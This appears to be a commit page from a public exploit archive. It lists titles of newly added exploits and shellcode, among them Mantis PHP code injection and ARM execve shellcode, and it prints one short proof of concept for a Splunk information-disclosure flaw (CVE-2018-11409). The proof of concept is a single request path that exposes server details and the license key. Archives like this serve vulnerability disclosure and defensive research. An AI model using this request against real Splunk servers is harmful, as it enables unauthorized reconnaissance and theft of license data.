0381c4c519
11 changes to exploits/shellcodes
Gnome Web (Epiphany) < 3.28.2.1 - Denial of Service
WebKit - WebAssembly Compilation Info Leak
Google Chrome - Integer Overflow when Processing WebAssembly Locals
WebKit - Use-After-Free when Resuming Generator
WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access
WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access
TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass
MantisBT XmlImportExport Plugin - PHP Code Injection (Metasploit)
Mantis Bug Tracker 1.2.0a3 < 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit) (2)
Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)
Mantis Bug Tracker 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)
MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Full Path Disclosure
MantisBT 1.2.3 (db_type) - Local File Inclusion
Mantis Bug Tracker 1.2.3 - 'db_type' Cross-Site Scripting / Full Path Disclosure
Mantis Bug Tracker 1.2.3 - 'db_type' Local File Inclusion
Mantis 0.15.x/0.16/0.17.x - JPGraph Remote File Inclusion Command Execution
Mantis Bug Tracker 0.15.x/0.16/0.17.x - JPGraph Remote File Inclusion Command Execution
Mantis 0.19 - Remote Server-Side Script Execution
Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities
Mantis 0.x - New Account Signup Mass Emailing
Mantis Bug Tracker 0.19 - Remote Server-Side Script Execution
Mantis Bug Tracker 0.x - Multiple Cross-Site Scripting Vulnerabilities
Mantis Bug Tracker 0.x - New Account Signup Mass Emailing
Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities
Mantis Bug Tracker 0.x/1.0 - Multiple Input Validation Vulnerabilities
Mantis 0.19.2/1.0 - 'Bug_sponsorship_list_view_inc.php' File Inclusion
Mantis Bug Tracker 0.19.2/1.0 - 'Bug_sponsorship_list_view_inc.php' File Inclusion
Mantis 0.x/1.0 - 'View_filters_page.php' Cross-Site Scripting
Mantis Bug Tracker 0.x/1.0 - 'View_filters_page.php' Cross-Site Scripting
Mantis 0.x/1.0 - 'view_all_set.php' Multiple Cross-Site Scripting Vulnerabilities
Mantis 0.x/1.0 - 'manage_user_page.php?sort' Cross-Site Scripting
Mantis Bug Tracker 0.x/1.0 - 'view_all_set.php' Multiple Cross-Site Scripting Vulnerabilities
Mantis Bug Tracker 0.x/1.0 - 'manage_user_page.php?sort' Cross-Site Scripting
MantisBT 1.1.8 - Cross-Site Scripting / SQL Injection
Mantis Bug Tracker 1.1.8 - Cross-Site Scripting / SQL Injection
MantisBT 1.2.19 - Host Header
Mantis Bug Tracker 1.2.19 - Host Header
MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)
Mantis Bug Tracker 1.2.0a3 < 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit) (1)
Monstra CMS < 3.0.4 - Cross-Site Scripting Automation
Monstra CMS < 3.0.4 - Cross-Site Scripting
XiongMai uc-httpd 1.0.0 - Buffer Overflow
Splunk < 7.0.1 - Information Disclosure
Linux/ARM - Egghunter (\x50\x90\x50\x90) + execve('/bin/sh') Shellcode (32 bytes)
Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)
Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)
17 lines
No EOL
637 B
Text
17 lines
No EOL
637 B
Text
# Exploit Title: Splunk < 7.0.1 - Information Disclosure
|
|
# Date: 2018-05-23
|
|
# Exploit Author: KoF2002
|
|
# Vendor Homepage: https://www.splunk.com/
|
|
# Version: 6.2.3 - 7.01 MAYBE ALL VERSION AFFECTED
|
|
# Tested on: Linux OS
|
|
# CVE : CVE-2018-11409
|
|
|
|
# Splunk through 6.2.3 7.0.1 allows information disclosure by appending
|
|
# /__raw/services/server/info/server-info?output_mode=json to a query,
|
|
# as demonstrated by discovering a license key and other information.
|
|
|
|
# PoC :
|
|
|
|
https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
|
|
|
|
# Greats : Cold z3ro , ihab pal and all HTLovers "We Are Back" |